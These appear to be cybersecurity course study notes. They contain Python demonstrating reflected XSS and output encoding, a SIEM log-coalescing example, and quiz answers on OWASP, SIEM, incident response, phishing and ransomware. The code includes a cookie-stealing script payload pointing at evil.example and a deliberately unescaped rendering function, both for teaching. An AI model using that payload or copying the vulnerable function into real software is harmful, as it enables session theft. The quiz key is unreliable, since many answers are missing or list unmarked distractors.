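def is_whitelisted_username(value):
    return USERNAME_RE.fullmatch(value) is not None

def render_greeting_vulnerable(name):
    # Reflected XSS: untrusted input lands in the HTML body unencoded.
    return f"<p>Welcome back, {name}!</p>"

def render_greeting_safe(name):
    # Output encoding for an HTML text context: & < > " ' become entities,
    # so the browser displays the characters instead of parsing them as markup.
    return f"<p>Welcome back, {html.escape(name, quote=True)}!</p>"

def js_string_literal(value):
    """Encode for a JavaScript string context: everything outside ASCII letters, digits
    and space becomes \\uXXXX, so quotes and ; ( ) / cannot break out of the literal."""
    return "".join(ch if (ch.isascii() and ch.isalnum()) or ch == " " else "\\u%04x" % ord(ch)
                   for ch in value)

# Constructed attack string of the kind a reflected XSS link would carry (cookie theft).
PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

if __name__ == "__main__":
    print(render_greeting_vulnerable(PAYLOAD))       # script tag reaches the browser intact
    print(render_greeting_safe(PAYLOAD))             # &lt;script&gt;... is shown as text
    print(render_greeting_safe("<b>Password</b>"))   # the quiz string, displayed literally
    print(js_string_literal('";alert(1)//'))
    print(is_whitelisted_username("alice42"), is_whitelisted_username("<b>x</b>"))
```

Whitelisting would have rejected the payload at input time; encoding protects the output even when the data arrived through a path the whitelist did not cover, which is why the quiz asks for both.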
How would you classify a hacktivist group who thinks that your company's stance on climate change threatens the survival of the planet?
a threat
Which software development lifecycle is characterized by short bursts of analysis, design, coding and testing during a series of 1 to 4 week sprints?
Agile and Scrum
Which software development lifecycle is characterized by a series of cycles and an emphasis on security?
Spiral
Which application testing method requires a URL to the application, is quick and cheap but also produces the most false-positive results?
DAST: Dynamic Application Security Testing
Which type of application attack would include buffer overflow, cross-site scripting, and SQL injection?
input validation
Which type of application attack would include unauthorized access to configuration stores, unauthorized access to administration interfaces and over-privileged process and service accounts?
Configuration management
Which one of the OWASP Top 10 Application Security Risks occurs when authentication and session management functions are implemented incorrectly, allowing attackers to compromise passwords, keys or session tokens?
Broken authentication
Which one of the OWASP Top 10 Application Security Risks occurs when restrictions on what a user is allowed to do are not properly enforced?
Broken access control
Which of these threat modeling methodologies is integrated seamlessly into an Agile development methodology?
VAST
Which phase of DevSecOps would contain the activities Secure application code, Secure infrastructure configuration, and OSS/COTS validation?
Code & build
Which phase of DevSecOps would contain the activities Detect & Visualize, Respond, and Recover?
Operate & monitor
The Deploy step in the DevSecOps Release, Deploy & Decommission phase contains which of these activities?
Versioning of infrastructure
Creation of Immutable images
Data backup cleansing
IAM controls to regulate authorization
The Respond step in the DevSecOps Operate & Monitor phase contains which of these activities?
Root Cause Analysis
Inventory
Chaos engineering
Virtual Patching
SIEM Platforms
Core Duties
Log Collection
Normalization
Correlation
Aggregation
Reporting
A SIEM system collects logs and other security documentation for analysis
The core function is to manage network security by monitoring flows and events
It consolidates log events and network flow data from thousands of devices, endpoints and applications distributed throughout a network
A SIEM system can be rules-based or employ a statistical correlation engine to establish relationships between event log entries
Captures log event and network flow data in near real time and applies advanced analytics to reveal security offenses
It can be available on prem and in a cloud environment
True or False. SIEMs capture network flow data in near real time and apply advanced analytics to reveal security offenses.
Which of these describes the process of data normalization in a SIEM?
Turns raw data into a format that has fields that SIEM can use
True or False. A SIEM considers any event that is anomalous, or outside the norm, to be an offense.
True or False. A large company might have QRadar event collectors in each of their data centers that are configured to forward all collected events to a central event processor for analysis.
The triad of a security operations center (SOC) is people, process and technology. To which part of the triad would vendor-specific training belong?
People
True or False. Information is often overlooked simply because the security analysts do not know how it is connected.
The partnership between security analysts and technology can be said to be grouped into 3 domains, human expertise, security analytics and artificial intelligence. The human expertise domain would contain which three (3) of these topics?
Morals
Common sense
Generalization
A robust cybersecurity defense includes contributions from 3 areas, human expertise, security analytics and artificial intelligence. Which of these areas would contain the ability for abstraction?
Human expertise
True or False. SIEMs can be available on premises and in a cloud environment.
For a SIEM, what are logs of specific actions such as user logins referred to?
Events
Which of these describes the process of data normalization in a SIEM?
Turns raw data into a format that has fields that the SIEM can use (indexing records for fast searching and sorting is a separate step, not normalization)
When a data stream entering a SIEM exceeds the volume it is licensed to handle, what are three (3) ways the excess data is commonly handled, depending upon the terms of the license agreement? (Select 3)
The data stream is throttled to accept only the amount allowed by the license
The excess data is stored in a queue until it can be processed
The excess data is dropped
The data is processed and the license is automatically bumped up to the next tier.
Which five (5) event properties must match before the event will be coalesced with other events? (Select 5)
Destination IP
Source Port
Destination Port
Source IP
Username
QID
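Worked example for the normalization and coalescing questions above (added here; not course material and not from the original notes). Raw lines from two different sources are normalized onto one common field set, then coalesced: events whose five key properties (event type/QID, source IP, destination IP, destination port, username) match within a short window are merged into one record with a count. Source port is kept in the normalized event but deliberately left out of the key, which is why it is the distractor in the quiz. The log lines, QID numbers and host address are constructed, and the 10-second window is an assumption for the example.

```python
import re
from datetime import datetime

# Constructed raw events from two log sources (not real QRadar payloads).
RAW_EVENTS = [
    "2024-01-15T10:00:01Z sshd[411]: Failed password for alice from 203.0.113.9 port 51000 ssh2",
    "2024-01-15T10:00:03Z sshd[411]: Failed password for alice from 203.0.113.9 port 51001 ssh2",
    "2024-01-15T10:00:05Z sshd[411]: Failed password for alice from 203.0.113.9 port 51002 ssh2",
    "2024-01-15T10:00:06Z sshd[411]: Failed password for alice from 203.0.113.9 port 51003 ssh2",
    "2024-01-15T10:00:07Z sshd[411]: Failed password for bob from 203.0.113.9 port 51004 ssh2",
    "2024-01-15T10:00:09Z FW: ACTION=DENY SRC=198.51.100.7 DST=10.0.0.5 DPT=3389 PROTO=TCP",
    "2024-01-15T10:00:30Z sshd[411]: Failed password for alice from 203.0.113.9 port 51010 ssh2",
]

SSH_FAIL = re.compile(r"^(?P<ts>\S+) sshd\[\d+\]: Failed password for (?P<user>\S+) "
                      r"from (?P<src>\S+) port (?P<sport>\d+)")
FW_DENY = re.compile(r"^(?P<ts>\S+) FW: ACTION=DENY SRC=(?P<src>\S+) DST=(?P<dst>\S+) DPT=(?P<dport>\d+)")

# Hypothetical event-type identifiers standing in for QRadar QIDs (constructed values).
QID_SSH_LOGIN_FAILED = 1001
QID_FW_DENY = 2001
SSH_HOST_IP = "10.0.0.5"   # assumption: address of the host whose sshd wrote the lines

COALESCE_FIELDS = ("qid", "src_ip", "dst_ip", "dst_port", "username")

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def normalize(raw):
    """Normalization: map a raw line from any source onto one common field set."""
    m = SSH_FAIL.match(raw)
    if m:
        return {"time": _ts(m["ts"]), "qid": QID_SSH_LOGIN_FAILED, "src_ip": m["src"],
                "dst_ip": SSH_HOST_IP, "dst_port": 22, "src_port": int(m["sport"]),
                "username": m["user"]}
    m = FW_DENY.match(raw)
    if m:
        return {"time": _ts(m["ts"]), "qid": QID_FW_DENY, "src_ip": m["src"],
                "dst_ip": m["dst"], "dst_port": int(m["dport"]), "src_port": None,
                "username": None}
    return None   # unparsed: a real SIEM stores it as a generic/unknown event

def coalesce(events, window_seconds=10):
    """Coalescing: events whose five key fields match within the window become one
    record carrying a count. Source port is deliberately NOT part of the key."""
    records = []
    open_bucket = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        key = tuple(ev[f] for f in COALESCE_FIELDS)
        b = open_bucket.get(key)
        if b and (ev["time"] - b["first"]).total_seconds() <= window_seconds:
            b["count"] += 1
            b["last"] = ev["time"]
        else:
            b = dict(zip(COALESCE_FIELDS, key), first=ev["time"], last=ev["time"], count=1)
            records.append(b)
            open_bucket[key] = b
    return records

def coalesce_raw(lines, window_seconds=10):
    return coalesce([e for e in map(normalize, lines) if e], window_seconds)

if __name__ == "__main__":
    for r in coalesce_raw(RAW_EVENTS):
        print(r["qid"], r["src_ip"], r["dst_ip"], r["dst_port"], r["username"], "x", r["count"])
```

Four of alice's failures collapse into one record with count 4 even though every attempt used a different source port; the attempt 29 seconds later falls outside the window and starts a new record. Coalescing trades per-event detail for volume, which matters when the incoming event rate is near the licensed limit discussed in the previous question.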
What is the goal of SIEM tuning?
To get the SIEM to sort out all false-positive offenses so only those that need to be investigated are presented to the investigators
True or False. QRadar event collectors send all raw event data to the central event processor for all data handling such as data normalization and event coalescence.
The triad of a security operations center (SOC) is people, process and technology. To which part of the triad would containment belong?
Process
True or False. There is a natural tendency for security analysts to choose to work on cases that they are familiar with and to ignore those that may be important but for which they have no experience.
Threat Hunting
Cyber threats pose many challenges to organizations today. Which three (3) of these are among those cited? (Select 3)
There is a cybersecurity skills shortage
It takes an average of 191 days to even detect an attack has occurred
Almost half of the breaches are caused by malicious or criminal acts
What percent of security leaders reported that threat hunting increased the speed and accuracy of response in detection of advanced threats?
91%
While 80% of the threats are known and detected, the 20% that remains unknown account for what percent of the damage?
80%
True or False. The skill set of a cyber threat hunter is very different from that of a cybersecurity analyst, and many threat hunters have backgrounds doing intelligence work.
True or False. A cyber threat hunting team generally sits at the center of the SOC Command Center.
There is value brought by each of the IBM i2 EIA use cases. Which one of these delivers net new discovery of correlating low level alerts and offenses?
Cyber Threat Hunting
What is one thing that makes cybersecurity threats so challenging to deal with?
There is a big shortage in cyber security skills and many job openings unfilled
The level 3 and 4 cybersecurity analysts working in a Security Operations Center (SOC) combat cyber crime by performing which type of activity?
Cyber forensic investigations
True or False. If you have no better place to start hunting threats, start with a view of your own organization then work your way up to an industry view and then a regional view, a national view and finally a global view of the threat landscape.
True or False. A cyber threat hunting team generally sits outside the SOC command center.
There is value brought by each of the IBM i2 EIA use cases. Which one of these identifies net new money chain transfers?
Fraud Investigations
Cybersecurity Capstone: Breach Response Case Studies
Incident Management Response and Cyberattack Frameworks
IRIS FRAMEWORK
In creating an incident response capability in your organization, NIST recommends taking 6 actions. Which three (3) actions are included on that list? (Select 3)
Establish a formal incident response capability
Develop an incident response plan based on the incident response policy
Create an incident response policy
Which incident response team model would best fit the needs of a small company that runs its business out of a single office building or campus?
Central incident response team
True or False. An incident response team needs a blend of members with strong technical and strong soft skills.
Assuring systems, networks, and applications are sufficiently secure to resist an attack is part of which phase of the incident response lifecycle?
Preparation
According to the IRIS Framework, during which stage of an attack would the attacker conduct external reconnaissance, align tactics, techniques and procedures to the target, and prepare his attack infrastructure?
Attack beginnings
According to the IRIS Framework, during which stage of an attack would the attacker escalate evasion tactics to evade detection?
Continuous phases occur
According to the IRIS framework, during the third phase of an attack when the attackers are attempting to escalate privileges, what should the IR team be doing as a countermeasure?
Analyze all network traffic and endpoints, searching for anomalous behavior
According to the IRIS framework, during the fifth phase of an attack, the attackers will attempt to execute their final objective. What should the IR team be doing as a countermeasure?
Thoroughly examine available forensics to understand attack details, establish mitigation priorities, provide data to law enforcement, and plan risk reduction strategies
True or False. A data breach only has to be reported to law enforcement if external customer data was compromised.
In creating an incident response capability in your organization, NIST recommends taking 6 actions. Which three (3) actions are included on that list? (Select 3)
Considering the relevant factors when selecting an incident response team model
Establish policies and procedures regarding incident-related information sharing
Secure executive sponsorship for the incident response plan
Develop incident response procedures
Which incident response team model would best fit the needs of the field offices of a large, distributed organization?
Hybrid incident response team
Distributed incident response team
Central incident response team
Coordinating incident response team
Which incident response team staffing model would be appropriate for a small retail store that has just launched an online selling platform and finds it is now under attack? The platform was put together by its very small IT department who has no experience in managing incident response.
Completely outsource the incident response work to an onsite contractor with expertise in monitoring and responding to incidents
Which three (3) technical skills are important to have in an organization's incident response team?
System administration
Encryption
Programming
Network administration
Identifying incident precursors and indicators is part of which phase of the incident response lifecycle?
Detection & Analysis
Automatically isolating a system from the network when malware is detected on that system is part of which phase of the incident response lifecycle?
Containment, Eradication & Recovery
According to the IRIS Framework, during which stage of an attack would the attacker send phishing email, steal credentials and establish a foothold in the target network?
Launch and execute the attack
According to the IRIS Framework, during which stage of an attack would the attacker execute their final objectives?
Attack objective execution
According to the IRIS framework, during the first stage of an attack, when the bad actors are conducting external reconnaissance and aligning their tactics, techniques and procedures, what should the IR team be doing as a countermeasure?
Build a threat profile of adversarial actors who are likely to target the company
According to the IRIS framework, during the fourth phase of an attack, the attackers will attempt to evade detection. What should the IR team be doing as a countermeasure?
Analyze all network traffic and endpoints, searching for anomalous behavior
True or False. A data breach always has to be reported to law enforcement agencies.
Phishing Scams
Some of the earliest known phishing attacks were carried out against which company?
America Online (AOL)
You have banked at "MyBank" for many years when you receive an urgent email telling you to log in to verify your security credentials or your account would be frozen. You are not wealthy but what little you have managed to save is in this bank. The email is addressed to "Dear Customer" and upon closer inspection you see it was sent from "security@mybank.yahoo.com". What kind of attack are you under?
As a phishing attack.
True or False. HTTPS assures that passwords and other data sent across the Internet are encrypted. Links in email that use HTTPS will protect you against phishing attacks.
Which three (3) of these statistics about phishing attacks are real? (Select 3)
The average cost of a data breach is $3.86 million.
15% of people successfully phished will be targeted at least one more time within a year.
Phishing accounts for 90% of data breaches.
12% of businesses reported being the victim of a phishing attack in 2018.
Which range best represents the number of unique phishing web sites reported to the Anti-Phishing Working Group (apwg.org) in Q4 2019?
Between 130,000 and 140,000.
Which is the most common type of identity theft?
Credit card fraud
Point of Sale Breach
True or False. There are more successful PoS attacks made against large online retailers than there are against small- to medium-sized brick-and-mortar businesses.
Which is the standard regulating credit card transactions and processing?
PCI-DSS
Which three (3) of these are PCI-DSS requirements for any company handling, processing or transmitting credit card data?
Do not use vendor-supplied defaults for system passwords and other security parameters
Protect stored cardholder data
Install and maintain a firewall configuration to protect cardholder data
Cardholder data may not reside on local PoS devices for more than 48 hours
True or False. A study conducted by the Ingenico Group found that credit card transactions were sufficiently secure as long as all participants were in strict compliance with PCI-DSS standards.
What are the two (2) most common operating systems for PoS devices?
Windows and Linux
If your credit card is stolen from a PoS system, what is the first thing the thief is likely to do with your card data?
Sell it to a distributor
Sell to a broker who will then sell in bulk to "carders" who then purchase pre-paid credit cards which are then used to buy gift cards which are then used to buy goods which are then sold for profit after being shipped to a re-shipper
PCI-DSS can best be described how?
A voluntary payment card industry data security standard
Which group suffers from the most PoS attacks?
Restaurants and small retail stores.
Which three (3) of these control processes are included in the PCI-DSS standard?
Protect cardholder data
Build and maintain a secure network and systems
Require use of multi-factor authentication for new card holders
Maintain a vulnerability management program
Which three (3) of these are PCI-DSS requirements for any company handling, processing or transmitting credit card data?
Encrypt transmission of cardholder data across open, public networks
Use and regularly update antivirus software
All employees with direct access to cardholder data must be bonded
Develop and maintain secure systems and applications
When is credit card data most vulnerable to PoS malware?
While in RAM
Which scenario best describes how a stolen credit card number is used to enrich the thief?
Stolen credit card numbers are sold to brokers who resell them to carders who use them to buy prepaid credit cards that are then used to buy gift cards that will be used to buy merchandise for resale
3rd Party Breach
A cyber attack originating from which three (3) of the following would be considered a supply-chain attack?
E-mail providers
Subcontractors
Web hosting companies
Which three (3) of these were cited as the top 3 sources of third-party breach?
Cloud-based storage or hosting providers
Online payment or credit card processing services
JavaScript on websites used for web analytics
True or False. While data loss from a third-party breach can be expensive, third-party breaches account for less than 22% of all breaches.
According to a 2019 Ponemon study, what percent of consumers say they will defect from a business if their personal information is compromised in a breach?
80%
True or False. According to a 2018 Ponemon study, organizations surveyed cited "A third-party misused or shared confidential information..." as their top cyber security concern for the coming year.
How effective were the processes for vetting third-parties as reported by the majority (64%) of the companies surveyed?
Somewhat or not effective
In the first few months of 2020, data breaches were reported from Instagram, Carson City, Amazon, GE, T-Mobile, radio.com, MSU, and Marriott. While different data were stolen from each organization, which two data elements were stolen from all of them?
Personal information
Customer financial information
True or False. More than 63% of data breaches can be linked to a third-party.
According to a 2019 Ponemon study, which is the most common course of action for a consumer who has lost personal data in a breach?
Tell others of their experience
Ransomware
3 Main Types
Crypto: Specific files encrypted
Locker: Completely locks out device
Leakware/Doxware: e.g. footage from webcam
Attack Vectors
Phishing
RDP
Software Vulns
Malicious Links
What is the most important thing to have in place that will save you from having to pay a ransom in the event you have fallen victim to a ransomware attack?
A full system backup
Which ransomware spread across 150 countries in 2017 and was responsible for over $4 billion in losses worldwide?
WannaCry
True or False. Projections are that ransomware will not be a significant problem in the future as operating systems become more secure and anti-malware applications gain in sophistication.
True or False. It is feared that in the future our cars, homes and factories may fall victim to ransomware attacks as more and more devices join the Internet of Things.